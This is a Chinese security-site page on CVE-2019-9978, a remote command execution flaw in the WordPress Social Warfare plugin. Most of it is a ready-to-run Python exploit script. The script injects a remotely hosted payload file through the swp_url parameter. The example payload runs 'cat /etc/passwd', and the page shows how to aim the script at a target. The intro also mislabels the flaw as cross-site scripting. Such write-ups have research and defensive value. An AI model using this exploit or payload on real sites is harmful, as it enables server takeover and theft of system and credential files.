menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right (CVE-2019-9978)WordPress Plugin - social warfare 远程命令执行漏洞 chevron_right (CVE-2019-9978)WordPress Plugin - social warfare 远程命令执行漏洞 .md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    (CVE-2019-9978)WordPress Plugin - social warfare 远程命令执行漏洞 .md
    2.67 KB / 2021-07-15 20:10:15
        (CVE-2019-9978)WordPress Plugin - social warfare 远程命令执行漏洞
    ===================================================================
    
    一、漏洞简介
    ------------
    
    WordPress
    social-warfare插件3.5.3之前版本中存在跨站脚本漏洞。远程攻击者可借助'swp\_url'参数利用该漏洞注入恶意的JavaScript脚本。
    
    二、漏洞影响
    ------------
    
    Social WarFare Plugin (\<=3.5.2)
    
    三、复现过程
    ------------
    
    ### poc
    
    > 首先在自己的服务器上传http(s)://www.0-sec.org/payload.txt
    
        <pre>system('cat /etc/passwd')</pre>
    
    > useage
    
         python cve-2019-9978.py --target http://vulntarget.com                              --payload-uri http://yourpayloadsite.com/payload.txt
        # Title: RCE in Social Warfare Plugin ( <=3.5.2 )
        # Date: March, 2019
        # Researcher: Luka Sikic
        # Exploit Author: hash3liZer
        # Download Link: https://wordpress.org/plugins/social-warfare/
        # Version: <= 3.5.2
        # CVE: CVE-2019-9978
    
        import sys
        import requests
        import re
        import urlparse
        import optparse
    
        class EXPLOIT:
    
            VULNPATH = "wp-admin/admin-post.php?swp_debug=load_options&swp_url=%s"
    
            def __init__(self, _t, _p):
                self.target  = _t
                self.payload = _p
    
            def engage(self):
                uri = urlparse.urljoin( self.target, self.VULNPATH % self.payload )
                r = requests.get( uri )
                if r.status_code == 500:
                    print "[*] Received Response From Server!"
                    rr  = r.text
                    obj = re.search(r"^(.*)<\!DOCTYPE", r.text.replace( "\n", "lnbreak" ))
                    if obj:
                        resp = obj.groups()[0]
                        if resp:
                            print "[<] Received: "
                            print resp.replace( "lnbreak", "\n" )
                        else:
                            sys.exit("[<] Nothing Received for the given payload. Seems like the server is not vulnerable!")
                    else:
                        sys.exit("[<] Nothing Received for the given payload. Seems like the server is not vulnerable!")
                else:
                    sys.exit( "[~] Unexpected Status Received!" )
    
        def main():
            parser = optparse.OptionParser(  )
    
            parser.add_option( '-t', '--target', dest="target", default="", type="string", help="Target Link" )
            parser.add_option( ''  , '--payload-uri', dest="payload", default="", type="string", help="URI where the file payload.txt is located." )
    
            (options, args) = parser.parse_args()
    
            print "[>] Sending Payload to System!"
            exploit = EXPLOIT( options.target, options.payload )
            exploit.engage()
    
        if __name__ == "__main__":
            main()
    
    
    links
    file_download